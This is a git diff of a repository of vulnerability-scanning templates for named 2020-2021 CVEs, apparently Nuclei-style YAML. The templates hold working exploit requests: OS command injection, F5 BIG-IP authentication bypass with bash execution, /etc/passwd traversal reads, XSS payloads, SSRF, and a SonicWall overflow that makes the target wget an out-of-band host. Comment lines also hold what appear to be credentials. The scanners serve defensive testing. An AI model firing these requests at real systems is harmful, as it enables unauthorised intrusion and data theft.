lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA== - userDetails - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "CTCWebServiceSi" - - "SOAP-ENV" - condition: and - - - type: word - part: header - words: - - "text/xml" - - "SAP NetWeaver Application Server" - - - type: status - status: - - 200 - -# userName - sapRpoc6351 -# password - Secure!PwD8890 -# digest: 490a0046304402206fb2a5da16ff132b2a21082b70432b3286b90e734a24e273a09465280bf374ee0220631d9f5a1ff141020710b9edd119eab03396ce1c7e9a508552b24155d6650132:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-7980(1).yaml b/poc/cve/cve-2020-7980(1).yaml deleted file mode 100644 index f9bc999b8e..0000000000 --- a/poc/cve/cve-2020-7980(1).yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-7980 -info: - name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution - author: ritikchaddha - severity: critical - description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.' - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-7980 - - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html - - https://github.com/Xh4H/Satellian-CVE-2020-7980 - - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-7980 - cwe-id: CWE-78 - metadata: - shodan-query: http.title:"Intellian Aptus Web" - tags: satellian,rce,cve,cve2020,intellian,aptus -requests: - - raw: - - | - POST /cgi-bin/libagent.cgi?type=J HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - Cookie: ctr_t=0; sid=123456789 - - {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1} - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/29 diff --git a/poc/cve/cve-2020-8194.yaml b/poc/cve/cve-2020-8194.yaml new file mode 100644 index 0000000000..bd7f67979e --- /dev/null +++ b/poc/cve/cve-2020-8194.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-8194 + +info: + name: Citrix ADC and Citrix NetScaler Gateway - Remote Code Injection + author: dwisiswant0 + severity: medium + description: Citrix ADC and NetScaler Gateway are susceptible to remote code injection. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18. Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allow modification of a file download. + remediation: | + Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. + reference: + - https://support.citrix.com/article/CTX276688 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8194 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.5 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 + epss-score: 0.90775 + epss-percentile: 0.98542 + cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: citrix + product: application_delivery_controller_firmware + tags: cve,cve2020,citrix + +http: + - raw: + - | + GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 + Host: {{Hostname}} + Cookie: startupapp=st + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "application/x-java-jnlp-file" + + - type: status + status: + - 200 +# digest: 4a0a004730450221008e18ba7d4c2e32d0f73d1647cf9f161bd007eed6513d0e57badd73330c4bbbfc02202246125e033d6ccaf0ef33eeae252e7c40449c4385db15dcf8af3fcd3c103cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-8497-5317.yaml b/poc/cve/cve-2020-8497-5317.yaml new file mode 100644 index 0000000000..cb79244f3d --- /dev/null +++ b/poc/cve/cve-2020-8497-5317.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8497 +info: + name: Artica Pandora FMS - Arbitrary File Read + author: gy741 + severity: medium + description: In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. + reference: + - https://k4m1ll0.com/cve-2020-8497.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-8497 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2020-8497 + cwe-id: CWE-306 + tags: cve,cve2020,fms,artica +requests: + - method: GET + path: + - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt' + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"type"' + - '"id_user"' + - '"user_name"' + - '"text"' + condition: and + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-8641-5330.yaml b/poc/cve/cve-2020-8641-5330.yaml new file mode 100644 index 0000000000..96f6de246c --- /dev/null +++ b/poc/cve/cve-2020-8641-5330.yaml @@ -0,0 +1,32 @@ +id: CVE-2020-8641 + +info: + name: Lotus Core CMS 1.0.1 - Local File Inclusion + author: 0x_Akoko + severity: high + tags: cve,cve2020,lfi,lotus + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-8641 + - https://cxsecurity.com/issue/WLB-2020010234 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8641 + cwe-id: CWE-22 + description: "Lotus Core CMS 1.0.1 allows authenticated Local File Inclusion of .php files via directory traversal in the index.php page_slug parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-8654(1).yaml b/poc/cve/cve-2020-8654(1).yaml new file mode 100644 index 0000000000..83629c7d1c --- /dev/null +++ b/poc/cve/cve-2020-8654(1).yaml @@ -0,0 +1,41 @@ +id: CVE-2020-8654 +info: + name: EyesOfNetwork 5.3 - Authenticated RCE + author: praetorian-thendrickson + severity: high + description: EyesOfNetwork version 5.1-5.3 is vulnerable to multiple exploits. Version 5.3 is vulnerable to CVE-2020-8654 (authenticated rce), CVE-2020-8655 (privesc), CVE-2020-8656 (SQLi - API version before 2.4.2), and 2020-8657 (hardcoded api key). Versions 5.1-5.3 are vulnerable to CVE-2020-9465 (SQLi). + reference: + - https://github.com/h4knet/eonrce + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb + - https://nvd.nist.gov/vuln/detail/CVE-2020-8657 + - https://github.com/EyesOfNetworkCommunity/eonweb/issues/50 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-8654 + cwe-id: CWE-78 + tags: cve,cve2020,cisa,eyesofnetwork,rce,authenticated +requests: + - method: GET + path: + - "{{BaseURL}}/css/eonweb.css" + extractors: + - type: regex + name: version + internal: true + part: body + group: 1 + regex: + - '# VERSION : ([0-9.]+)' + matchers-condition: and + matchers: + - type: dsl + dsl: + - compare_versions(version, '< 5.4', '>= 5.1') + - type: word + part: body + words: + - "EyesOfNetwork" + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-9043(1).yaml b/poc/cve/cve-2020-9043(1).yaml new file mode 100644 index 0000000000..a69d7a2a55 --- /dev/null +++ b/poc/cve/cve-2020-9043(1).yaml @@ -0,0 +1,64 @@ +id: CVE-2020-9043 +info: + name: WordPress wpCentral < 1.5.1 - Improper Access Control to Privilege Escalation + author: scent2d + severity: high + description: | + The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account. + reference: + - https://wpscan.com/vulnerability/10074 + - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043 + - https://wordpress.org/plugins/wp-central/#developers + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2020-9043 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/index.php HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1 + Host: {{Hostname}} + redirects: true + max-redirects: 2 + cookie-reuse: true + req-condition: true + matchers: + - type: dsl + dsl: + - "contains(all_headers_4, 'text/html')" + - "status_code_4 == 200" + - "contains(body_4, 'wpCentral Connection Key')" + - contains(body_4, "pagenow = \'dashboard\'") + condition: and + extractors: + - type: regex + name: authkey + part: body + group: 1 + regex: + - 'style="word-wrap:break-word;">([a-z0-9]+)' + internal: true + - type: regex + name: nonce + part: body + group: 1 + regex: + - '_wpnonce=([0-9a-z]+)' + internal: true diff --git a/poc/cve/cve-20200924a.yaml b/poc/cve/cve-20200924a.yaml new file mode 100644 index 0000000000..7bfd8f9b88 --- /dev/null +++ b/poc/cve/cve-20200924a.yaml @@ -0,0 +1,33 @@ +id: CVE-20200924a +info: + name: Web requests can navigate outside of DRP controlled areas - Directory traversal + author: c-sh0 + severity: critical + description: Web requests can navigate outside of DRP controlled areas - Directory traversal + reference: + - https://docs.rackn.io/en/latest/doc/security/cve_20200924A.html + - https://docs.rackn.io/en/latest/doc/release.html + - https://registry.hub.docker.com/v1/repositories/digitalrebar/provision/tags + - Affected versions - v4.3.0, v4.3.2, v4.3.3, v4.4.0 (maybe others) + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-20200924a + cwe-id: CWE-22 + tags: cve,cve2020,lfi,rackn,digitalrebar +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - 'X-Drp-Sha256sum:' + - type: regex + regex: + - "root:.*:0:0" diff --git a/poc/cve/cve-2021-20038-5443.yaml b/poc/cve/cve-2021-20038-5443.yaml new file mode 100644 index 0000000000..3829b17fc3 --- /dev/null +++ b/poc/cve/cve-2021-20038-5443.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-20038 +info: + name: SonicWall SMA100 Stack BoF to Unauthenticated RCE + author: dwisiswant0, jbaines-r7 + severity: critical + description: | + A Stack-based buffer overflow vulnerability in SMA100 + Apache httpd server's mod_cgi module environment variables + allows a remote unauthenticated attacker to potentially + execute code as a 'nobody' user in the appliance. + This vulnerability affected SMA 200, 210, 400, 410 and 500v + appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, + 10.2.1.2-24sv and earlier versions. + reference: + - https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis + tags: cve,cve2021,overflow,rce,sonicwall + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20038 + cwe-id: CWE-787 +requests: + - raw: + - | + GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1 + Host: {{Hostname}} + attack: clusterbomb + payloads: + prefix_addr: + - "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address + system_addr: + - "%08%b7%06%08" # for 10.2.1.2-24sv + - "%64%b8%06%08" # for 10.2.1.1-1[79]sv + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/cve/cve-2021-21287-5492.yaml b/poc/cve/cve-2021-21287-5492.yaml deleted file mode 100644 index ba8af857bf..0000000000 --- a/poc/cve/cve-2021-21287-5492.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-21287 -info: - name: MinIO Browser API - Server-Side Request Forgery - author: pikpikcu - severity: high - description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability. - reference: - - https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q - - https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html - - https://github.com/minio/minio/pull/11337 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21287 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N - cvss-score: 7.7 - cve-id: CVE-2021-21287 - cwe-id: CWE-918 - tags: cve,cve2021,minio,ssrf,oast -requests: - - raw: - - | - POST /minio/webrpc HTTP/1.1 - Host: {{interactsh-url}} - Content-Type: application/json - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 - Content-Length: 76 - - {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"} - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" # Confirms the HTTP Interaction - - type: word - words: - - "We encountered an internal error" - -# Enhanced by mp on 2022/06/27 diff --git a/poc/cve/cve-2021-21745(1).yaml b/poc/cve/cve-2021-21745(1).yaml new file mode 100644 index 0000000000..c867bee9c3 --- /dev/null +++ b/poc/cve/cve-2021-21745(1).yaml @@ -0,0 +1,34 @@ +id: CVE-2021-21745 +info: + name: ZTE MF971R - Referer authentication bypass + author: gy741 + severity: medium + description: | + ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould + use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + reference: + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21745 + - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2021-21745 + cwe-id: CWE-287 + tags: zte,auth-bypass,cve,cve2021,router +requests: + - raw: + - | + GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 + Host: {{Hostname}} + Referer: http://interact.sh/127.0.0.1.html + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'psw_fail_num_str":"[0-9]' + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/21 diff --git a/poc/cve/cve-2021-21801-5531.yaml b/poc/cve/cve-2021-21801-5531.yaml new file mode 100644 index 0000000000..53fca1f877 --- /dev/null +++ b/poc/cve/cve-2021-21801-5531.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-21801 +info: + name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,rseenet,xss,graph + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-21801 + cwe-id: CWE-79 +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22' + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-21803-5536.yaml b/poc/cve/cve-2021-21803-5536.yaml new file mode 100644 index 0000000000..3d5e278a05 --- /dev/null +++ b/poc/cve/cve-2021-21803-5536.yaml @@ -0,0 +1,27 @@ +id: CVE-2021-21803 +info: + name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS) + author: gy741 + severity: medium + description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 + tags: cve,cve2021,r-seenet,xss +requests: + - method: GET + path: + - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22' + matchers-condition: and + matchers: + - type: word + words: + - '"zlo onerror=alert(1) "' + - 'Device Status Graph' + part: body + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-22054(1).yaml b/poc/cve/cve-2021-22054(1).yaml new file mode 100644 index 0000000000..1599beb9ec --- /dev/null +++ b/poc/cve/cve-2021-22054(1).yaml @@ -0,0 +1,32 @@ +id: CVE-2021-22054 +info: + name: VMWare Workspace ONE UEM - Server-Side Request Forgery + author: h1ei1 + severity: high + description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + reference: + - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ + - https://www.vmware.com/security/advisories/VMSA-2021-0029.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-22054 + cwe-id: CWE-918 + metadata: + fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + tags: cve,cve2021,vmware,workspace,ssrf +requests: + - method: GET + path: + - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/27 diff --git a/poc/cve/cve-2021-22145-5591.yaml b/poc/cve/cve-2021-22145-5591.yaml new file mode 100644 index 0000000000..8f8afb81a1 --- /dev/null +++ b/poc/cve/cve-2021-22145-5591.yaml @@ -0,0 +1,37 @@ +id: CVE-2021-22145 +info: + name: ElasticSearch 7.13.3 - Memory disclosure + author: dhiyaneshDk + severity: medium + description: A memory disclosure vulnerability was identified in Elasticsearch 7.10.0 to 7.13.3 error reporting. A user with the ability to submit arbitrary queries to Elasticsearch could submit a malformed query that would result in an error message returned containing previously used portions of a data buffer. This buffer could contain sensitive information such as Elasticsearch documents or authentication details. + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml + - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 + - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html + - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-22145 + cwe-id: CWE-209 + tags: cve,cve2021,elasticsearch +requests: + - method: POST + path: + - '{{BaseURL}}/_bulk' + headers: + Content-Type: application/json + body: | + @ + matchers-condition: and + matchers: + - type: word + words: + - 'root_cause' + - 'truncated' + - 'reason' + part: body + condition: and + - type: status + status: + - 400 diff --git a/poc/cve/cve-2021-22214-5601.yaml b/poc/cve/cve-2021-22214-5601.yaml deleted file mode 100644 index 7ab4f3ff4a..0000000000 --- a/poc/cve/cve-2021-22214-5601.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2021-22214 -info: - name: Gitlab CE/EE 10.5 - Server-Side Request Forgery - author: Suman_Kar,GitLab Red Team - severity: high - description: | - GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are: - - CVE-2021-39935 - - CVE-2021-22214 - - CVE-2021-22175 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39935 - - https://nvd.nist.gov/vuln/detail/CVE-2021-22175 - - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html - - https://docs.gitlab.com/ee/api/lint.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2021-22214,CVE-2021-39935,CVE-2021-22175 - cwe-id: CWE-918 - metadata: - shodan-query: http.title:"GitLab" - tags: cve,cve2021,gitlab,ssrf -requests: - - method: POST - path: - - "{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true" - headers: - Content-Type: application/json - body: | - {"content": "include:\n remote: http://127.0.0.1:9100/test.yml"} - redirects: true - max-redirects: 3 - matchers: - - type: word - part: body - words: - - "does not have valid YAML syntax" - -# Enhanced by mp on 2022/06/27 diff --git a/poc/cve/cve-2021-22986-5612.yaml b/poc/cve/cve-2021-22986-5612.yaml new file mode 100644 index 0000000000..714ad3c19a --- /dev/null +++ b/poc/cve/cve-2021-22986-5612.yaml @@ -0,0 +1,60 @@ +id: CVE-2021-22986 + +info: + name: F5 BIG-IP iControl REST - Remote Command Execution + author: rootxharsh,iamnoooob + severity: critical + description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability. + reference: + - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 + - https://support.f5.com/csp/article/K03009991 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-22986 + tags: bigip,cve,cve2021,rce,mirai,kev + +requests: + - raw: + - | + POST /mgmt/shared/authn/login HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + Authorization: Basic YWRtaW46 + Content-Type: application/json + Cookie: BIGIPAuthCookie=1234 + + {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}} + - | + POST /mgmt/tm/util/bash HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en + X-F5-Auth-Token: {{token}} + Content-Type: application/json + + {"command":"run","utilCmdArgs":"-c id"} + + extractors: + - type: regex + part: body + internal: true + name: token + group: 1 + regex: + - "([A-Z0-9]{26})" + + - type: regex + part: body + group: 1 + regex: + - "\"commandResult\":\"(.*)\"" + + matchers: + - type: word + words: + - "commandResult" + - "uid=" + condition: and + +# Enhanced by mp on 2022/05/05 diff --git a/poc/cve/cve-2021-23241-5621.yaml b/poc/cve/cve-2021-23241-5621.yaml new file mode 100644 index 0000000000..51758557d4 --- /dev/null +++ b/poc/cve/cve-2021-23241-5621.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-23241 +info: + name: Mercury Router Web Server Directory Traversal + author: daffainfo + severity: medium + description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. + reference: + - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md + - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 + - https://www.mercusys.com/en/ + - https://www.mercurycom.com.cn/product-521-1.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2021-23241 + cwe-id: CWE-22 + tags: cve,cve2021,iot,lfi,router +requests: + - method: GET + path: + - "{{BaseURL}}/loginLess/../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 diff --git a/poc/cve/cve-2021-24146-5631.yaml b/poc/cve/cve-2021-24146-5631.yaml deleted file mode 100644 index 61d3d453df..0000000000 --- a/poc/cve/cve-2021-24146-5631.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2021-24146 - -info: - name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export - description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. - author: random_robbie - severity: high - reference: https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - tags: wordpress,wp-plugin,cve,cve2021 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N - cvss-score: 7.50 - cve-id: CVE-2021-24146 - cwe-id: CWE-284 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" - - matchers-condition: and - matchers: - - type: word - words: - - "mec-events" - - "text/csv" - condition: and - part: header - - - type: status - status: - - 200 diff --git a/poc/cve/cve-2021-24236(1).yaml b/poc/cve/cve-2021-24236(1).yaml deleted file mode 100644 index cc0cd70f13..0000000000 --- a/poc/cve/cve-2021-24236(1).yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: CVE-2021-24236 -info: - name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload - author: pussycat0x - severity: critical - description: | - The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE. - reference: - - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea - - https://wordpress.org/plugins/imagements/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-24236 - cwe-id: CWE-434 - tags: cve,cve2021,upload,rce,wordpress,wp-plugin,imagements,wp,unauth -variables: - php: "{{to_lower('{{randstr}}')}}.php" - post: "1" -requests: - - raw: - - | - POST /wp-comments-post.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU - - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="comment" - - {{randstr}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="author" - - {{randstr}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="email" - - {{randstr}}@email.com - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="url" - - - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="checkbox" - - yes - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="naam" - - {{randstr}} - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="image"; filename="{{php}}" - Content-Type: image/jpeg - - - - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="submit" - - Post Comment - ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU - Content-Disposition: form-data; name="comment_post_ID" - - {{post}} - 